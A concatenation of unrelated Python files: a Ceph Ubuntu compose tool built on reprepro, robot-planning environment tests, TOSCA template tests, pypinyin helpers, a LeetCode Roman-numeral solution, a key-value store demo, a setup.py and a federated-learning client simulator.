except KeyError:
# backwards compatibility option for old configurations
self.release_version = conf['product_version']
# Extra files to put at the root of the compose
self.extra_files = conf['extra_files']
# Whether sources composition should be included or skipped
self.include_sources = conf.get('include_sources', True)
# Compose type for output directory name
self.compose_type = conf.get('compose_type', 'test')
# Whether -dbg composition should be included or skipped
self.include_dbg = conf.get('include_dbg', True)
self.date = time.strftime('%Y%m%d', time.gmtime())
# We only support one arch: x86_64.
self.arch = 'x86_64'
self.respin = self._find_respin()
def validate(self):
"""
Sanity-check that files exist before we go to the work of running.
"""
if not self.koji_profile:
if self.chacra_url is None:
raise RuntimeError('Set koji_profile or chacra_url')
self.validate_builds_lists()
# comps XML
for comps_file in self.comps.values():
if not os.access(comps_file, os.R_OK):
raise RuntimeError('Unreadable comps file %s' % comps_file)
# variants XML
if not os.access(self.variants_file, os.R_OK):
raise RuntimeError('Unreadable variants file %s' %
self.variants_file)
# extra_files
for extra_file in self.extra_files:
# For "file" type extra files, we expect it in the user's cwd.
if 'file' in extra_file:
src = os.path.join('extra_files', extra_file['file'])
if not os.access(src, os.R_OK):
raise RuntimeError('Unreadable extra file %s' % src)
def validate_builds_lists(self):
if len(self.builds) < 1:
raise RuntimeError('No builds files in config')
distros = self.builds.keys()
for distro, filename in self.builds.items():
if not os.access(filename, os.R_OK):
raise RuntimeError('Unreadable builds file %s' % filename)
# Sanity-check the build NVRs for any mention of other_distros.
with open(filename, 'r') as builds_fh:
build_ids = [line.rstrip('\n') for line in builds_fh]
other_distros = [d for d in distros if d != distro]
for build_id in build_ids:
for bad_distro in other_distros:
if bad_distro in build_id:
msg = '%s build %s in file %s' % (bad_distro, build_id,
filename)
raise RuntimeError(msg)
def _generate_id(self, respin):
"""
Generate a compose ID for this respin.
:param int respin: a respin number for this compose
:returns: a compose ID
"""
compose_type = COMPOSE_TYPE_MAP[self.compose_type]
name_tmpl = '{release_short}-{release_version}-{oslabel}-{arch}-{date}{compose_type}.{respin}' # NOQA
return name_tmpl.format(release_short=self.release_short,
release_version=self.release_version,
oslabel='Ubuntu',
date=self.date,
arch=self.arch,
compose_type=compose_type,
respin=respin)
def _find_respin(self):
"""
Find the next available respin number in self.target.
Use the same logic that pungi/compose.py uses in order come up with
the name for the output directory. The name should be something
like "Ceph-1.3-Ubuntu-20160922.t.0-x86_64" to match what
Pungi creates.
"""
respin = 0
while self._compose_id_dir_exists(respin):
respin += 1
return respin
def _compose_id_dir_exists(self, respin):
"""
Return True if a compose ID directory exists for this respin.
:param int respin: respin number for generating an ID
:returns: True if the directory exists, or False if it does not exist
"""
compose_id = self._generate_id(respin)
directory = os.path.join(self.target, compose_id)
if os.path.isdir(directory):
log.info('Found prior compose dir: %s' % directory)
return True
return False
@property
def id(self):
return self._generate_id(self.respin)
@property
def output_dir(self):
return os.path.join(self.target, self.id)
def run(self):
""" High-level function to execute a compose. """
self.validate()
if not os.path.isdir(self.cache_path):
os.makedirs(self.cache_path)
if not os.path.isdir(self.target):
os.makedirs(self.target)
# Make top-level output directory for this compose.
os.mkdir(self.output_dir)
# Top-level "dbg" directory, parallel to our output_dir.
if self.include_dbg:
dbg_dir = self.output_dir + '-dbg'
os.mkdir(dbg_dir)
# Top-level "sources" directory, parallel to our output_dir.
if self.include_sources:
sources_dir = self.output_dir + '-sources'
os.mkdir(sources_dir)
build_metadata = {}
# Run the steps for each distro.
for distro in self.builds.keys():
# (We assume that all keys in self.builds also exist in
# self.comps.)
if distro not in self.comps.keys():
msg = ('Loading builds for "{0}", and the comps '
'configuration is missing a "{0}" key. Please add a '
'comps XML file for this distro.').format(distro)
raise SystemExit(msg)
build_metadata[distro] = self.run_distro(distro)
# Copy any extra files to the root of the compose.
for extra_file in self.extra_files:
# For "glob" type extra files, glob the compose's output_dir, and
# copy the results to the root.
if 'glob' in extra_file:
glob_path = os.path.join(self.output_dir, extra_file['glob'])
for f in glob.glob(glob_path):
copy(f, self.output_dir)
# For "file" type extra files, copy the file from the user's cwd.
if 'file' in extra_file:
copy(os.path.join('extra_files', extra_file['file']),
self.output_dir)
# write compose metadata
metadata.write(self, build_metadata)
# create "latest" symlink
self.symlink_latest()
@property
def latest_name(self):
tmpl = '{release_short}-{major_version}-{oslabel}-{arch}-latest'
major_version = self.release_version.rsplit('.', 1)[0]
return tmpl.format(
release_short=self.release_short,
major_version=major_version,
oslabel='Ubuntu',
arch=self.arch,
)
def symlink_latest(self):
""" Create the "latest" symlink for this output_dir. """
latest_path = os.path.join(self.target, self.latest_name)
try:
os.unlink(latest_path)
except OSError as e:
if e.errno != errno.ENOENT:
log.error('Problem deleting "latest" symlink')
raise SystemExit(e)
os.symlink(os.path.relpath(self.output_dir, start=self.target),
latest_path)
def run_distro(self, distro):
"""
Execute a compose for a distro.
:returns: list of builds for this distro.
"""
# Read pkg mappings from Pungi-style comps XML.
# (Assembles a master list of package names that we will need.)
comps_file = self.comps[distro]
comps = Comps()
comps.parse_file(comps_file)
# Query chacra for our list of builds.
if self.koji_profile:
tag = self.builds[distro]
builds = koji.query(profile=self.koji_profile,
tag=tag,
whitelist=comps.all_packages)
else:
builds_file = self.builds[distro] # builds .txt for this distro
builds = chacra.query(builds_file=builds_file,
chacra_url=self.chacra_url,
whitelist=comps.all_packages,
ssl_verify=self.chacra_ssl_verify)
# Cache all our builds into self.cache_dir.
gather.cache(builds=builds,
cache_dir=self.cache_path,
ssl_verify=self.chacra_ssl_verify)
# Assign the builds' files to the correct groups, according to
# comps.xml + variants.xml.
dbg_binaries = set()
for build in builds:
# Assign each binary to its respective comps group(s).
for binary in build.binaries:
comps.assign_binary_to_groups(binary)
# And track all dbg binaries.
if comps.is_present(binary.dbg_parent):
dbg_binaries.add(binary)
# Download all the source artifacts for this build and put them in
# the "sources" directory.
if self.include_sources:
# Top-level "sources" directory, parallel to our output_dir.
sources_dir = self.output_dir + '-sources'
for source in build.sources:
# We've already downloaded to cache_path earlier, so this
# is just a copy operation now:
source.download(cache_dir=self.cache_path,
dest_dir=sources_dir)
variants = Variants()
variants.parse_file(self.variants_file)
# Create a repository for each variant.
for variant_id, groups in variants.items():
repo_path = os.path.join(self.output_dir, variant_id)
binaries = set()
for group_id in groups:
to_add = comps.groups[group_id].binaries
log.info('Adding %d binaries from comps ID %s to variant %s' %
(len(to_add), group_id, variant_id))
binaries.update(to_add)
self.create_repo(repo_path, distro, binaries)
# Create dbg repository.
if self.include_dbg:
dbg_path = self.output_dir + '-dbg'
self.create_repo(dbg_path, distro, dbg_binaries)
return builds
def create_repo(self, repo_path, distro, binaries):
""" Create a repository at repo_path. """
# Top-level directory for this (variant) repository:
if not os.path.isdir(repo_path):
os.mkdir(repo_path)
# Set up the reprepro configuration:
log.info('Creating reprepro configuration for %s' % repo_path)
conf_dir = os.path.join(repo_path, 'conf')
if not os.path.isdir(conf_dir):
os.mkdir(conf_dir)
distributions_path = os.path.join(conf_dir, 'distributions')
dist_template = textwrap.dedent('''\
Codename: {codename}
Suite: stable
Components: main
Architectures: amd64 i386
Origin: Red Hat, Inc.
Description: Ceph distributed file system
DebIndices: Packages Release . .gz .bz2
DscIndices: Sources Release .gz .bz2
Contents: .gz .bz2
''')
with open(distributions_path, 'a') as dist_conf_file:
dist_conf_file.write(dist_template.format(codename=distro))
for binary in binaries:
# Add this binary to our variant's repo/directory:
self.add_binary_to_repo(binary=binary,
repo_path=repo_path,
distro=distro)
def add_binary_to_repo(self, binary, repo_path, distro):
""" Add a binary (.deb) to a Debian repository. """
msg = 'Running reprepro to add %s to %s distro in %s'
log.info(msg % (binary.name, distro, repo_path))
binary_path = os.path.join(self.cache_path, binary.filename)
command = [
'reprepro',
'--ask-passphrase',
'-b', repo_path,
'-C', 'main',
'--ignore=wrongdistribution',
'--ignore=wrongversion',
'--ignore=undefinedtarget',
'includedeb', distro, binary_path
]
log.info('running command: %s' % ' '.join(command))
proc = subprocess.Popen(
command,
stdout=subprocess.PIPE
)
out, err = proc.communicate()
exit_code = proc.wait()
if err:
for i in err:
log.error(i)
if exit_code != 0:
msg = 'command failed with status code: %s'
raise RuntimeError(msg % exit_code)
|
"""Test cases for the boring room vs playroom environment."""
import numpy as np
import pytest
from predicators.src import utils
from predicators.src.envs.playroom import PlayroomEnv
from predicators.src.structs import Action
def test_playroom():
"""Tests for PlayroomEnv class properties."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
for task in env.get_train_tasks():
for obj in task.init:
assert len(obj.type.feature_names) == len(task.init[obj])
for task in env.get_test_tasks():
for obj in task.init:
assert len(obj.type.feature_names) == len(task.init[obj])
assert len(env.predicates) == 19
assert {pred.name for pred in env.goal_predicates} == \
{"On", "OnTable", "LightOn", "LightOff"}
assert len(env.options) == 10
assert len(env.types) == 5
assert env.action_space.shape == (5, )
assert abs(env.action_space.low[0] - PlayroomEnv.x_lb) < 1e-3
assert abs(env.action_space.high[0] - PlayroomEnv.x_ub) < 1e-3
assert abs(env.action_space.low[1] - PlayroomEnv.y_lb) < 1e-3
assert abs(env.action_space.high[1] - PlayroomEnv.y_ub) < 1e-3
assert abs(env.action_space.low[2]) < 1e-3
assert abs(env.action_space.high[2] - 10) < 1e-3
assert abs(env.action_space.low[3] + 1) < 1e-3
assert abs(env.action_space.high[3] - 1) < 1e-3
def test_playroom_failure_cases():
"""Tests for the cases where simulate() is a no-op."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
On = [o for o in env.predicates if o.name == "On"][0]
OnTable = [o for o in env.predicates if o.name == "OnTable"][0]
block_type = [t for t in env.types if t.name == "block"][0]
robot_type = [t for t in env.types if t.name == "robot"][0]
block0 = block_type("block0")
block1 = block_type("block1")
block2 = block_type("block2")
task = env.get_train_tasks()[0]
state = task.init
atoms = utils.abstract(state, env.predicates)
robot = None
for item in state:
if item.type == robot_type:
robot = item
break
assert robot is not None
# Check robot is not next to any door
with pytest.raises(RuntimeError):
env._get_door_next_to(state) # pylint: disable=protected-access
# Test failure case for _get_region_in() helper
with pytest.raises(RuntimeError):
env._get_region_in(state, 150) # pylint: disable=protected-access
# block1 is on block0 is on the table, block2 is on the table
assert OnTable([block0]) in atoms
assert OnTable([block1]) not in atoms
assert OnTable([block2]) in atoms
assert On([block1, block0]) in atoms
# No block at this pose, pick fails
act = Action(np.array([19, 19, 0.45, -0.75, 0]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Object not clear, pick fails
act = Action(np.array([12.2, 11.8, 0.45, 0.35, 0]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Cannot putontable or stack without picking first
act = Action(np.array([12.2, 11.8, 5, 0.35, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
act = Action(np.array([19, 14, 0.45, 0.95, 0.8]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Perform valid pick
act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
assert not np.allclose(state[block2], next_state[block2])
state = next_state
atoms = utils.abstract(state, env.predicates)
assert OnTable([block2]) not in atoms
# Cannot pick twice in a row
act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Cannot stack onto non-clear block
act = Action(np.array([12.2, 11.8, 0.8, 0.35, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Cannot stack onto no block
act = Action(np.array([15, 16, 0.8, -0.5, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Cannot stack onto yourself
act = Action(np.array([11.8, 18, 1.5, -0.15, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Cannot put on table when not clear
act = Action(np.array([12.2, 11.8, 0.5, 0.35, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
# Cannot move to invalid location
act = Action(np.array([40, 5, 0, 0, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Cannot move to not be next to a door, table, or dial
act = Action(np.array([5, 5, 0, 0, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
def test_playroom_simulate_blocks():
"""Tests for the cases where simulate() allows the robot to interact with
blocks."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
block_type = [t for t in env.types if t.name == "block"][0]
robot_type = [t for t in env.types if t.name == "robot"][0]
block1 = block_type("block1")
block2 = block_type("block2")
task = env.get_train_tasks()[0]
state = task.init
robot = None
for item in state:
if item.type == robot_type:
robot = item
break
assert robot is not None
# Move to boring room door
act = Action(np.array([29.6, 15, 1, 1, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
state = next_state
# Move to table but do not pick block 1
act = Action(np.array([12, 11.8, 0.95, 0.35, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
assert np.allclose(state[block1], next_state[block1])
state = next_state
# Perform valid pick of block 1 (do not have to face the block)
act = Action(np.array([12, 11.8, 0.95, -0.35, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
assert not np.allclose(state[block1], next_state[block1])
state = next_state
# Perform valid put on table
act = Action(np.array([19, 14, 0.45, 0.95, 0.8]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[block1], next_state[block1])
state = next_state
# Perform valid pick of block 2
act = Action(np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
assert not np.allclose(state[block2], next_state[block2])
state = next_state
# Perform valid stack
act = Action(np.array([12.2, 11.8, 5, 0.35, 0.7]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[block2], next_state[block2])
state = next_state
def test_playroom_simulate_doors_and_dial():
"""Tests for the cases where simulate() allows the robot to interact with
doors and the dial."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
door_type = [t for t in env.types if t.name == "door"][0]
robot_type = [t for t in env.types if t.name == "robot"][0]
dial_type = [t for t in env.types if t.name == "dial"][0]
door1 = door_type("door1")
door6 = door_type("door6")
task = env.get_train_tasks()[0]
state = task.init
robot = None
dial = None
for item in state:
if item.type == robot_type:
robot = item
if item.type == dial_type:
dial = item
assert robot is not None
assert dial is not None
# Move to boring room door but do not open it
act = Action(np.array([29.8, 15, 3, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
state = next_state
# Open boring room door
act = Action(np.array([29.8, 15, 3, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[door1], next_state[door1])
state = next_state
# Cannot move directly to playroom even though doors are all open
act = Action(np.array([125, 15, 1, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Move to playroom
actions = [
np.array([30.3, 15, 3, 0, 1]).astype(np.float32),
np.array([49.8, 15, 3, 0, 1]).astype(np.float32),
np.array([50.3, 15, 3, 0, 1]).astype(np.float32),
np.array([59.8, 15, 3, 0, 1]).astype(np.float32),
np.array([60.3, 15, 3, 0, 1]).astype(np.float32),
np.array([79.8, 15, 3, 0, 1]).astype(np.float32),
np.array([80.3, 15, 3, 0, 1]).astype(np.float32),
np.array([99.8, 15, 3, 0, 1]).astype(np.float32),
np.array([100.3, 15, 3, 0, 1]).astype(np.float32),
np.array([109.8, 15, 3, 0, 1]).astype(np.float32),
]
for arr in actions:
act = Action(arr)
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
for o in state:
if o.type != robot_type:
assert np.allclose(
state[o], next_state[o]
), f"obj {o} in state {state} and \nnext state {next_state}"
state = next_state
# Can't directly move through door6 to the dial
act = Action(np.array([126, 15, 1, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Advance through door6
act = Action(np.array([110.2, 15, 3, 0.5, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[robot], next_state[robot])
state = next_state
# Can't directly move left through door6 and end next to door5
act = Action(np.array([100.3, 15, 3, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Shut door to playroom
act = Action(np.array([110.2, 15, 3, 1, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[door6], next_state[door6])
state = next_state
# Cannot advance through closed door
act = Action(np.array([109.6, 15, 3, 1, 1]).astype(np.float32))
with pytest.raises(utils.EnvironmentFailure):
next_state = env.simulate(state, act)
# Move to dial but do not toggle it
act = Action(np.array([125, 15.1, 1, -0.5, 1]).astype(np.float32))
next_state = env.simulate(state, act)
for o in state:
if o.type != robot_type:
assert np.allclose(state[o], next_state[o])
else:
assert not np.allclose(state[o], next_state[o])
state = next_state
# Cannot move from dial into region 6
act = Action(np.array([109.7, 15, 3, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert state.allclose(next_state)
# Turn dial on, facing S (can toggle when not facing dial)
act = Action(np.array([125, 14.9, 1, -0.5, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[dial], next_state[dial])
state = next_state
# Turn dial off, facing E
act = Action(np.array([125, 15, 1, 0, 1]).astype(np.float32))
next_state = env.simulate(state, act)
assert not np.allclose(state[dial], next_state[dial])
state = next_state
# Turn dial on, facing N
act = Action(np.array([125, 14.9, 1, 0.5, 1]).astype(np.float32))
state = env.simulate(state, act)
# Turn dial off, facing W
act = Action(np.array([125.1, 15, 1, 1, 1]).astype(np.float32))
state = env.simulate(state, act)
def test_playroom_options():
"""Tests for predicate option policies."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
robot_type = [t for t in env.types if t.name == "robot"][0]
block_type = [t for t in env.types if t.name == "block"][0]
door_type = [t for t in env.types if t.name == "door"][0]
dial_type = [t for t in env.types if t.name == "dial"][0]
region_type = [t for t in env.types if t.name == "region"][0]
On = [p for p in env.predicates if p.name == "On"][0]
OnTable = [p for p in env.predicates if p.name == "OnTable"][0]
Clear = [p for p in env.predicates if p.name == "Clear"][0]
LightOn = [p for p in env.predicates if p.name == "LightOn"][0]
robot = robot_type("robby")
block0 = block_type("block0")
block1 = block_type("block1")
block2 = block_type("block2")
door1 = door_type("door1")
door2 = door_type("door2")
door3 = door_type("door3")
door4 = door_type("door4")
door5 = door_type("door5")
door6 = door_type("door6")
dial = dial_type("dial")
region1 = region_type("region1")
region2 = region_type("region2")
region3 = region_type("region3")
region4 = region_type("region4")
region5 = region_type("region5")
region6 = region_type("region6")
region7 = region_type("region7")
task = env.get_train_tasks()[0]
state = task.init
# Run through a specific plan of options.
Pick = [o for o in env.options if o.name == "Pick"][0]
Stack = [o for o in env.options if o.name == "Stack"][0]
PutOnTable = [o for o in env.options if o.name == "PutOnTable"][0]
MoveToDoor = [o for o in env.options if o.name == "MoveToDoor"][0]
MoveDoorToDial = [o for o in env.options if o.name == "MoveDoorToDial"][0]
OpenDoor = [o for o in env.options if o.name == "OpenDoor"][0]
CloseDoor = [o for o in env.options if o.name == "CloseDoor"][0]
TurnOnDial = [o for o in env.options if o.name == "TurnOnDial"][0]
TurnOffDial = [o for o in env.options if o.name == "TurnOffDial"][0]
plan = [
Pick.ground([robot, block1], [0.35]),
PutOnTable.ground([robot], [0.1, 0.5, 0.0]), # put block1 on table
Pick.ground([robot, block2], [-0.15]),
# stack block2 on block1
Stack.ground([robot, block1], [0.0]),
MoveToDoor.ground([robot, region1, door1], [-0.2, 0.0, 0.0]),
OpenDoor.ground([robot, door1], [-0.2, 0.0, 0.0, 0.0]),
# advance through door1
MoveToDoor.ground([robot, region1, door1], [0.4, 0.0, 0.0]),
# move to door2
MoveToDoor.ground([robot, region2, door2], [-0.4, 0.0, 0.0]),
# etc.
MoveToDoor.ground([robot, region2, door2], [0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region3, door3], [-0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region3, door3], [0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region4, door4], [-0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region4, door4], [0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region5, door5], [-0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region5, door5], [0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region6, door6], [-0.3, 0.0, 0.0]),
MoveToDoor.ground([robot, region6, door6], [0.3, 0.0, 0.0]),
CloseDoor.ground([robot, door6], [0.2, 0.0, 0.0, 1.0]),
MoveDoorToDial.ground([robot, region7, dial], [-1.0, 0.0, 0.0]),
TurnOffDial.ground([robot, dial], [0.0, -0.2, 0.0, 0.5]),
TurnOnDial.ground([robot, dial], [-0.2, 0.0, 0.0, 0.0])
]
assert plan[0].initiable(state)
policy = utils.option_plan_to_policy(plan)
# Here's an example of how to make a video within this test.
# monitor = utils.SimulateVideoMonitor(task, env.render_state)
# traj = utils.run_policy_with_simulator(policy,
# env.simulate,
# task.init,
# lambda _: False,
# max_num_steps=len(plan),
# monitor=monitor)
# Uncomment to save the video.
# video = monitor.get_video()
# outfile = "hardcoded_options_playroom.mp4"
# utils.save_video(outfile, video)
traj = utils.run_policy_with_simulator(policy,
env.simulate,
task.init,
task.goal_holds,
max_num_steps=len(plan))
final_atoms = utils.abstract(traj.states[-1], env.predicates)
assert LightOn([dial]) in final_atoms
assert OnTable([block1]) in final_atoms
assert On([block2, block1]) in final_atoms
assert Clear([block0]) in final_atoms
assert Clear([block1]) not in final_atoms
assert Clear([block2]) in final_atoms
def test_playroom_action_sequence_video():
"""Test to sanity check rendering."""
utils.reset_config({"env": "playroom"})
env = PlayroomEnv()
# Run through a specific plan of low-level actions.
task = env.get_train_tasks()[0]
action_arrs = [
# Pick up a block
np.array([11.8, 18, 0.45, -0.15, 0]).astype(np.float32),
# Stack block
np.array([12.2, 11.8, 2, 0.35, 1]).astype(np.float32),
# Move to door1
np.array([29.6, 16, 3, 0, 1]).astype(np.float32),
# Open door1
np.array([29.8, 15, 3, 0, 1]).astype(np.float32),
# Move down hallway to playroom
np.array([30.3, 15, 3, 0, 1]).astype(np.float32),
np.array([49.8, 15, 3, 0, 1]).astype(np.float32),
np.array([50.3, 15, 3, 0, 1]).astype(np.float32),
np.array([59.8, 15, 3, 0, 1]).astype(np.float32),
np.array([60.3, 15, 3, 0, 1]).astype(np.float32),
np.array([79.8, 15, 3, 0, 1]).astype(np.float32),
np.array([80.3, 15, 3, 0, 1]).astype(np.float32),
np.array([99.8, 15, 3, 0, 1]).astype(np.float32),
np.array([100.3, 15, 3, 0, 1]).astype(np.float32),
np.array([109.8, 15, 3, 0, 1]).astype(np.float32),
np.array([110.2, 15, 3, 0.5, 1]).astype(np.float32),
# Shut playroom door
np.array([110.2, 15, 3, -1, 1]).astype(np.float32),
# Move to dial
np.array([127, 15, 1, -1, 1]).astype(np.float32),
# Turn dial on
np.array([125, 15.1, 1, -0.5, 1]).astype(np.float32),
]
policy = utils.action_arrs_to_policy(action_arrs)
traj = utils.run_policy_with_simulator(policy,
env.simulate,
task.init,
task.goal_holds,
max_num_steps=len(action_arrs))
# Render a state where we're grasping
env.render_state(traj.states[1], task)
# Render end state with open and closed doors
env.render_state(traj.states[-1], task, caption="caption")
|
import unittest
from toscalib.templates.topology import ToscaTopology
from tests.utils.test_utils import init_template
class TestTopologyTemplateMethods(unittest.TestCase):
def test_update_mapping_template_pointer(self):
template = init_template()
sub_sec = {'node_type': 'substituteNodeType', 'capabilities': {'substituteCapability': ['nodeName', 'capabilityName']}}
sub_type = template.db.NODE_TYPES.get('substituteNodeType')
self.assertIsNone(sub_type.mapping_template)
template._parse_substitution(template.db, sub_sec)
self.assertIsNotNone(sub_type.mapping_template)
self.assertEqual(sub_type.mapping_template, template)
def test_parse_substitution(self):
template = init_template()
sub_sec = {'node_type': 'substituteNodeType', 'requirements': {'substituteRequirement': ['node2', 'dummyRequirement']}, 'capabilities': {'substituteCapability': ['nodeName', 'capabilityName']}}
self.assertIsNone(template.sub_type)
self.assertEqual(len(template.sub_rules), 0)
template._parse_substitution(template.db, sub_sec)
self.assertEqual(template.sub_type, 'substituteNodeType')
self.assertEqual(len(template.sub_rules), 3)
def test_prepare_output(self):
template = ToscaTopology('topoName')
res = template._prepare_output()
self.assertEqual(res, {'00_YAMLORDER_tosca_definitions_version': 'tosca_simple_yaml_1_0_0', '14_YAMLORDER_topology_template': {}})
template = init_template()
res = template._prepare_output()
self.assertEqual(res, {'00_YAMLORDER_tosca_definitions_version': 'tosca_simple_yaml_1_0_0', '14_YAMLORDER_topology_template': {'11_YAMLORDER_inputs': {'inputName': {'00_YAMLORDER_type': 'string'}},
'13_YAMLORDER_node_templates': {'node2': {'00_YAMLORDER_type': 'nodeTypeName', '01_YAMLORDER_properties': {'propertyName': None},'05_YAMLORDER_requirements': [{'dummyRequirement': 'nodeName'}]},
'nodeName': {'00_YAMLORDER_type': 'nodeTypeName', '01_YAMLORDER_properties': {'propertyName': None}}}}})
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from pypinyin.style._tone_convert import ( # noqa
to_normal,
to_tone,
to_tone2,
to_tone3,
to_initials,
to_finals,
to_finals_tone,
to_finals_tone2,
to_finals_tone3,
tone_to_normal,
tone_to_tone2,
tone_to_tone3,
tone2_to_normal,
tone2_to_tone,
tone2_to_tone3,
tone3_to_normal,
tone3_to_tone,
tone3_to_tone2,
# 向后兼容
_improve_tone3,
_get_number_from_pinyin,
_v_to_u,
_fix_v_u,
_re_number,
) # noqa
|
#
# @lc app=leetcode id=13 lang=python3
#
# [13] Roman to Integer
#
class Solution:
def romanToInt(self, s: str) -> int:
romanMap = {"I": 1, "V": 5, "X": 10, "L": 50, "C": 100, "D": 500, "M": 1000}
ans = 0
nextChar = "a"
for c in s[::-1]:
ans += romanMap[c]
if c == "I" and (nextChar in "VX"):
ans -= 2
elif c == "X" and (nextChar in "LC"):
ans -= 20
elif c == "C" and (nextChar in "DM"):
ans -= 200
nextChar = c
return ans
|
#!/usr/bin/python3
from jk_keyvaluestore import DirBasedKeyValueStore
ds = DirBasedKeyValueStore("data", 1)
ds.synchronize()
ds.put("somekey", [ "a", 1 ])
print(ds.keys())
ds.remove("somekey")
print(ds.keys())
ds.synchronize()
|
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(name='netandloc',
version='1.0',
description='Python Library To facilitate the manipulation of datasets from OR_NETWORK_AND_DISCRETE_LOCATION',
author='xNok',
author_email='nokwebspace@gmail.com',
url='https://github.com/xNok/OR_NETWORK-AND-DISCRETE-LOCATION',
packages=find_packages(),
) |
import os
import pickle
from abc import ABC, abstractmethod
import numpy as np
class BaseSim(ABC):
@abstractmethod
def is_active(self, cur_time):
pass
@abstractmethod
def get_completion_time(self, model_size):
pass
def active_till_the_end(self, cur_time, model_size):
pass
class ClientSim(BaseSim):
def __init__(self, trace, speed, args):
self.trace = trace
self.compute_speed = speed['computation']
self.bandwidth = speed['communication']
self.args = args
self.behavior_index = 0
def is_active(self, cur_time):
norm_time = cur_time % self.trace['finish_time']
while norm_time > self.trace['inactive'][self.behavior_index]:
if self.behavior_index == 0 and norm_time > self.trace['inactive'][-1]:
break
self.behavior_index += 1
self.behavior_index %= len(self.trace['active'])
if self.trace['active'][self.behavior_index] <= norm_time <= self.trace['inactive'][self.behavior_index]:
return True
return False
def active_till_the_end(self, cur_time, model_size):
if not self.is_active(cur_time):
return False
end_time = cur_time + self.get_completion_time(model_size)
norm_time = cur_time % self.trace['finish_time']
end_norm = end_time % self.trace['finish_time']
if end_norm < norm_time:
end_norm = end_norm + self.trace['finish_time']
if end_norm <= self.trace['inactive'][self.behavior_index]:
return True
return False
def get_completion_time(self, model_size):
return 3 * self.args.batch_size * self.args.epochs * float(self.compute_speed) / 1000 \
+ 2 * model_size / float(self.bandwidth)
def load_sim_data(aggregator_args):
script_dir = os.path.dirname(__file__)
with open(os.path.join(script_dir, 'client_behave_trace'), 'rb') as tr:
trace_data = list(pickle.load(tr).values())
with open(os.path.join(script_dir, 'client_device_capacity'), 'rb') as cp:
capacity_data = list(pickle.load(cp).values())
worst_to_best = list(np.load(os.path.join(script_dir, 'avail_worst_to_best.npy')))
client_sim_data = []
if aggregator_args.trace_distro == 'random':
indices = range(aggregator_args.client_num_in_total)
elif aggregator_args.trace_distro == 'high_avail':
indices = distribute(.6, .2, aggregator_args, worst_to_best)
elif aggregator_args.trace_distro == 'low_avail':
indices = distribute(.2, .6, aggregator_args, worst_to_best)
elif aggregator_args.trace_distro == 'average':
indices = distribute(.2, .2, aggregator_args, worst_to_best)
else:
raise AttributeError(
'Invalid trace_distro. Possible options: {}'.format('"random" or "high_avail" or "low_avail" or "average"'))
for client_id in indices:
client_sim = ClientSim(
trace_data[client_id % len(trace_data)],
capacity_data[client_id % len(capacity_data)],
aggregator_args
)
client_sim_data.append(client_sim)
return client_sim_data
def distribute(high, low, args, worst_to_best):
best_count = int(np.round(high * args.client_num_in_total))
worst_count = int(np.round(low * args.client_num_in_total))
mid_count = args.client_num_in_total - best_count - worst_count
start = int(np.round(len(worst_to_best) / 2 - mid_count / 2))
return worst_to_best[:worst_count] + worst_to_best[-best_count:] + worst_to_best[start:start + mid_count]
|
